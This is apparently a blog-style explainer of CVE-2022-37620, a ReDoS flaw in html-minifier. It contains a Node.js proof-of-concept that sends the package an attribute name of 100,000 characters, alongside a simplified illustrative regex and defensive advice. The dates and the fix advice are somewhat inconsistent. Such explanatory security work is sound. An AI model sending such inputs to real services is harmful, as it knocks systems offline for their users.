In August 2022, CVE-2022-37620 brought attention to a critical Denial of Service vulnerability in the popular kangax/html-minifier tool. This bug didn’t require advanced cyber trickery or deep system access, just a carefully formed input and a regular expression prone to excessive backtracking. Let’s walk through what made this ReDoS (Regular Expression Denial of Service) hole possible and see how a few lines of input could bring your Node.js process to a crawl.

What Is html-minifier?

html-minifier is an npm module used by thousands to shrink HTML files for web performance. It cleans up comments, whitespace, and sometimes JavaScript/CSS blended into the markup. You run html-minifier before shipping work to production.

The Flaw: Where It Lurks

The bug affects version 4.0.0 of html-minifier. Other versions may be susceptible, but this was the one most discussed.

The problem centers on a variable called candidate in htmlminifier.js. This variable is sent through a regular expression during the minification process. If the input is maliciously crafted, this regex can keep your CPU busy for tens of seconds or even minutes, applying backtracking and burning server cycles as it tries to make sense of the input.

The Vulnerable Code (Simplified View)

Inside the package, logic similar to this is present (this is a simplified snippet to show the problem):

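// htmlminifier.js (illustrative sketch, not the library's literal source)

function minify(html) {
  // For illustration, treat the whole input as 'candidate'; in the real
  // package it is a string taken from the HTML being processed
  var candidate = html;

  // Simplified stand-in for the vulnerable regex
  var regex = /([^\s]+)\s*=(["'])(.*?)\2/g;
  var match;
  var pairs = [];
  while ((match = regex.exec(candidate)) !== null) {
    // Collect each attribute name/value pair the regex finds
    pairs.push({ name: match[1], value: match[3] });
  }
  return pairs;
}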


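The trouble comes from the regular expression ([^\s]+)\s*=(["'])(.*?)\2. The leading ([^\s]+) greedily swallows every non-whitespace character it can, then hands characters back one at a time while the engine looks for the = that must follow. On a long run with no spaces, and no = where the pattern needs one, that search is repeated from every starting position, so the work grows roughly with the square of the input length: thousands of characters can mean millions of steps.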
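To get a feel for that growth, here is a minimal timing sketch. It uses the simplified regex from the snippet above, not the library's actual code, and the helper name timeMatch and the input sizes are assumptions chosen for illustration. It compares an input the pattern can match with one that contains no = at all.

```javascript
// Simplified regex from the snippet above (illustrative, not the library's literal source).
const attrRegex = /([^\s]+)\s*=(["'])(.*?)\2/;

// Run one match attempt and report whether it matched and how long it took.
function timeMatch(input) {
  const start = process.hrtime.bigint();
  const matched = attrRegex.test(input);
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { matched, elapsedMs };
}

for (const n of [2000, 4000, 8000]) {
  const matching = timeMatch('a'.repeat(n) + '="x"'); // pattern can succeed
  const hostile = timeMatch('a'.repeat(n));           // no '=' anywhere
  console.log(
    `n=${n} matching=${matching.elapsedMs.toFixed(2)}ms hostile=${hostile.elapsedMs.toFixed(2)}ms`
  );
}
```

On a backtracking engine, the hostile timings would be expected to grow roughly fourfold each time n doubles, while the matching ones stay small. Exact numbers depend on the machine and the Node.js version.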

Triggering the ReDoS

The key to triggering this bug is to provide an input that causes excessive backtracking. Here’s a minimal real-world example in Node.js:

const minifier = require('html-minifier');

// Build malicious HTML with an extremely long attribute name
const attackString = '<div ' + 'a'.repeat(100000) + '="x"></div>';

const started = Date.now();
try {
    // On a vulnerable version this call may hang or pin a CPU core
    minifier.minify(attackString, {
        collapseWhitespace: true
    });
    console.log('Finished in ' + (Date.now() - started) + ' ms');
} catch (e) {
    console.error('Error:', e);
}


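If you run this (please do so only in a safe test environment), you may find your Node.js process pinning a CPU core at 100%. Worse, because the regex runs synchronously on the main thread, the event loop is blocked and the process stops responding until the match finishes.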

Why Does This Happen?

When a regex isn’t carefully written and the input is crafted to exploit its structure, a backtracking regex engine (the kind JavaScript uses) can fall into catastrophic backtracking: it tries a huge number of ways to split the input in search of a match that will never exist. Some regex libraries offer timeouts or non-backtracking engines; standard JavaScript regular expressions offer neither, so a slow match simply runs to completion. This is an infamous attack vector: ReDoS.

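In html-minifier, ([^\s]+)\s*=(["'])(.*?)\2 is trying to match attribute="value" pairs: a greedy name, an equals sign, then a lazily matched quoted value. But when candidate contains tens of thousands of consecutive non-whitespace characters (a long run of ‘a’s, for example) and the rest of the pattern cannot be satisfied after them, the engine backtracks through that run again and again, and the match attempt chokes.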
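The cost can be made concrete with a small counting model. This is a sketch of how a naive backtracking matcher would handle just the [^\s]+= prefix of the simplified pattern (the optional \s* is left out for clarity). It is not how V8 is implemented, and the function names are hypothetical. It counts how often the matcher tests a character against '='.

```javascript
// ASCII whitespace test, a subset of what \s covers (enough for this illustration).
function isSpace(ch) {
  return ch === ' ' || ch === '\t' || ch === '\n' ||
         ch === '\r' || ch === '\f' || ch === '\v';
}

// Model of a backtracking engine running /[^\s]+=/ at every start offset.
// Returns how many times a character is tested against '='.
function countEqualsChecks(input) {
  let checks = 0;
  for (let start = 0; start < input.length; start++) {
    // Greedy [^\s]+: consume every non-whitespace character from `start`.
    let end = start;
    while (end < input.length && !isSpace(input[end])) end++;
    // Backtrack: give back one character at a time, testing for '=' each time.
    for (let stop = end; stop > start; stop--) {
      checks++;
      if (input[stop] === '=') return checks; // match found, the engine stops
    }
  }
  return checks; // no match at any start offset
}

for (const n of [1000, 2000, 4000]) {
  console.log(n, countEqualsChecks('a'.repeat(n)));
}
```

For a run of n characters with no '=', the model performs n(n+1)/2 checks, so doubling the input roughly quadruples the work. An input such as 'aaaa=' needs only two checks, because the first start offset succeeds almost immediately.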

References

- GitHub Security Advisory
- CVE Record on NVD
- Original html-minifier on GitHub
- OWASP: Regular Expression Denial of Service - ReDoS

Exploit in Plain Terms

1. Attacker crafts HTML with an extremely long attribute name (could be hundreds of thousands of characters).
2. Attacker sends the HTML to an application/server using html-minifier on their inputs (think web build tools, on-the-fly HTML optimizers, or server-side renderers).
3. The minifier’s regex backtracks over the input, pinning a CPU core and blocking the Node.js event loop until the match finishes, so other requests stall.

How to Fix or Defend

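- Update html-minifier if a patched release is available for your setup, and check the advisory to confirm which versions are actually fixed. Until then, treat untrusted HTML as hostile: cap its size before minifying, or run minification in a separate process or worker that can be stopped after a timeout.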
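As one possible stopgap, untrusted HTML can be screened before it reaches the minifier. The sketch below is an assumption-laden example, not part of html-minifier: the function names and both thresholds are hypothetical and would need tuning for real content. It rejects input that is too large overall or that contains a very long run of non-whitespace characters, using a single regex-free pass.

```javascript
// Length of the longest run of consecutive non-whitespace characters.
// Single linear pass, no regular expressions involved.
function longestUnbrokenRun(text) {
  let longest = 0;
  let current = 0;
  for (let i = 0; i < text.length; i++) {
    const code = text.charCodeAt(i);
    // ASCII space, tab, line feed, vertical tab, form feed, carriage return
    const isSpace = code === 32 || (code >= 9 && code <= 13);
    current = isSpace ? 0 : current + 1;
    if (current > longest) longest = current;
  }
  return longest;
}

// Hypothetical gate: the limits are illustrative defaults, not recommendations.
function isSafeToMinify(html, limits = {}) {
  const maxLength = limits.maxLength || 1000000;
  const maxRun = limits.maxRun || 10000;
  return html.length <= maxLength && longestUnbrokenRun(html) <= maxRun;
}

const hostile = '<div ' + 'a'.repeat(100000) + '="x"></div>';
console.log(isSafeToMinify('<div class="a"></div>')); // small, ordinary markup
console.log(isSafeToMinify(hostile));                 // very long attribute name
```

A check like this only narrows the attack surface. Legitimate pages with long inline data URIs could exceed the run limit, and it does not replace fixing or isolating the vulnerable regex.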

Conclusion

CVE-2022-37620 serves as a reminder that regular expressions, while powerful, can be dangerous if misused, especially in open-source software used at scale. Tiny mistakes in regex can open doors for attackers to bring production systems to a grinding halt.

If you’re maintaining a web service or static site toolchain using html-minifier, update now and scan your dependency trees. It’s easier to fix a vulnerable regex than it is to explain why your site was down for hours!

Stay safe, and treat complex regexes with respect!

*Exclusive guide by AI Assistant. Feel free to share or cite with a link to the CVE and original project. For more in-depth security posts, follow this space!*

Timeline

Published on: 10/31/2022 12:15:00 UTC
Last modified on: 11/01/2022 17:59:00 UTC